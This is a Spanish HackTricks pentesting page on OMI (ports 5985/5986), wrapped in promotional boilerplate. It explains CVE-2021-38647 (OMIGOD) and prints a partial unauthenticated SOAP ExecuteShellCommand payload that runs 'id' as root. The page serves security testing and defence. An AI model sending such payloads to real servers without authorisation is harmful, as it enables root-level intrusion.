4.6 KiB
5985,5986 - Pentesting OMI
Aprende hacking en AWS de cero a héroe con htARTE (Experto en Equipo Rojo de AWS de HackTricks)!
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión de PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre La Familia PEASS, nuestra colección exclusiva de NFTs
- Obtén el oficial PEASS & HackTricks swag
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y repositorio de hacktricks-cloud.
Información Básica
OMI se presenta como una herramienta de código abierto de Microsoft, diseñada para la gestión de configuraciones remotas. Es especialmente relevante para servidores Linux en Azure que utilizan servicios como:
- Automatización de Azure
- Actualización Automática de Azure
- Suite de Gestión de Operaciones de Azure
- Análisis de Log de Azure
- Gestión de Configuración de Azure
- Diagnostics de Azure
El proceso omiengine
se inicia y escucha en todas las interfaces como root cuando se activan estos servicios.
Los puertos predeterminados utilizados son 5985 (http) y 5986 (https).
Vulnerabilidad CVE-2021-38647
Según se observó el 16 de septiembre, los servidores Linux implementados en Azure con los servicios mencionados son susceptibles debido a una versión vulnerable de OMI. Esta vulnerabilidad radica en el manejo de mensajes del servidor OMI a través del endpoint /wsman
sin requerir un encabezado de Autenticación, autorizando incorrectamente al cliente.
Un atacante puede explotar esto enviando un payload SOAP "ExecuteShellCommand" sin un encabezado de Autenticación, obligando al servidor a ejecutar comandos con privilegios de root.
<s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:a="http://schemas.xmlsoap.org/ws/2004/08/addressing"
...
<s:Body>
<p:ExecuteShellCommand_INPUT xmlns:p="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/SCX_OperatingSystem">
<p:command>id</p:command>
<p:timeout>0</p:timeout>
</p:ExecuteShellCommand_INPUT>
</s:Body>
</s:Envelope>
Para obtener más información sobre esta CVE verifica aquí.
Referencias
- https://www.horizon3.ai/omigod-rce-vulnerability-in-multiple-azure-linux-deployments/
- https://blog.wiz.io/omigod-critical-vulnerabilities-in-omi-azure/
Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert)!
- ¿Trabajas en una empresa de ciberseguridad? ¿Quieres ver tu empresa anunciada en HackTricks? ¿O quieres tener acceso a la última versión del PEASS o descargar HackTricks en PDF? ¡Consulta los PLANES DE SUSCRIPCIÓN!
- Descubre The PEASS Family, nuestra colección exclusiva de NFTs
- Obtén la ropa oficial de PEASS & HackTricks
- Únete al 💬 grupo de Discord o al grupo de telegram o sígueme en Twitter 🐦@carlospolopm.
- Comparte tus trucos de hacking enviando PRs al repositorio de hacktricks y al repositorio de hacktricks-cloud.